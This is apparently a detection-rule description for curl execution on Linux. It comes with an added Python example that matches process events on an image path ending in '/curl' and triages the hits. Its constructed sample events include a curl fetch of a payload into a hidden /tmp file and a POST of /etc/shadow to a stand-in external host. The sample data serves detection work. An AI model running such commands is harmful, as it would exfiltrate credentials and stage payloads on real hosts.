
Summary
The detection rule identifies execution of the curl command on Linux hosts. curl is a command-line tool for transferring data to or from a server over protocols such as HTTP, HTTPS and FTP. The rule fires on a process-creation event whose image name matches '/curl', that is, the executable path ends in /curl (for example /usr/bin/curl), which indicates that a file download or a request to a remote server may be taking place. Attackers use curl to fetch payloads and tooling onto a compromised host, to push data out to infrastructure they control, and occasionally as a crude beacon in shell-based implants, so curl launched from an unexpected parent process, user or working directory is worth examining as possible ingress-tool-transfer, exfiltration or command-and-control activity. The rule carries a low severity level: curl is also run routinely by package managers, health checks, container entrypoints and deployment scripts, so a match on its own is not evidence of compromise and should be triaged against the command line, parent process and destination host rather than alerted on directly. Note the coverage limits of a path suffix match: it does not fire on other transfer tools such as wget, python or busybox, nor on a copy of the curl binary that has been renamed, and it will also match any unrelated binary that happens to be named curl.
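The following Python is an added example, not the rule's own code or the detection engine it ships in. It applies the rule's core condition (image path ends in '/curl') to a handful of constructed process-creation events, then layers a simple triage pass on each match so the low-severity hits can be ranked. Field names (Image, CommandLine, ParentImage, User), the sample events and the triage heuristics are all assumptions made for the example.

```python
import ipaddress
import shlex
from urllib.parse import urlparse

# Constructed sample process-creation events; field names are an assumption
# of this example, not the rule's schema. Hosts use example.net documentation names.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/curl", "ParentImage": "/bin/bash", "User": "www-data",
     "CommandLine": "curl -fsSL https://cdn.example.net/payload.sh -o /tmp/.x"},
    {"Image": "/usr/bin/curl", "ParentImage": "/usr/bin/python3", "User": "app",
     "CommandLine": "curl -sf http://127.0.0.1:8080/healthz"},
    {"Image": "/usr/bin/curlftpfs", "ParentImage": "/bin/bash", "User": "root",
     "CommandLine": "curlftpfs ftp.example.net /mnt/ftp"},
    {"Image": "/usr/bin/wget", "ParentImage": "/bin/bash", "User": "root",
     "CommandLine": "wget https://cdn.example.net/file"},
    {"Image": "/opt/tools/curl", "ParentImage": "/bin/sh", "User": "root",
     "CommandLine": "./curl -X POST --data-binary @/etc/shadow https://drop.example.net/up"},
]

SHELLS = ("/bash", "/sh", "/dash", "/zsh")
DOWNLOAD_FLAGS = {"-o", "--output", "-O", "--remote-name"}
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form"}
DATA_FLAGS = {"-d", "--data", "--data-binary", "--data-raw"}


def matches_rule(event):
    """The rule's condition: the executable path ends in '/curl'.
    This does not match curlftpfs, wget, or a renamed curl binary."""
    return event.get("Image", "").endswith("/curl")


def is_internal(host):
    """Loopback, RFC 1918 and 'localhost' count as internal; any other
    hostname is treated as external (no allowlist in this example)."""
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private


def triage(event):
    """Heuristic reasons an analyst would escalate a curl execution.
    Combined short flags such as '-sSo' are deliberately not parsed."""
    argv = shlex.split(event.get("CommandLine", ""))
    reasons = []
    for i, arg in enumerate(argv):
        if arg in DOWNLOAD_FLAGS:
            reasons.append("writes response to disk")
        elif arg in UPLOAD_FLAGS:
            reasons.append("uploads local file content")
        elif arg in DATA_FLAGS and i + 1 < len(argv) and argv[i + 1].startswith("@"):
            reasons.append("uploads local file content")
    for arg in argv:
        if arg.startswith(("http://", "https://", "ftp://")):
            host = urlparse(arg).hostname
            if host and not is_internal(host):
                reasons.append(f"contacts external host {host}")
    if event.get("ParentImage", "").endswith(SHELLS):
        reasons.append("spawned from a shell")
    return reasons


def run_rule(events):
    """Apply the rule to a stream of events and attach triage reasons."""
    return [
        {"index": i, "image": e["Image"], "user": e.get("User"), "reasons": triage(e)}
        for i, e in enumerate(events)
        if matches_rule(e)
    ]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print(hit)
```

In this sample the rule fires three times: the health check from python3 against loopback produces no triage reasons and can be suppressed, while the download to /tmp and the POST of /etc/shadow both contact external hosts from a shell and would be escalated. The curlftpfs and wget events show the coverage boundary of a suffix match.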
Categories
- Linux
- Endpoint
- Network
Data Sources
- Process
Created: 2022-09-15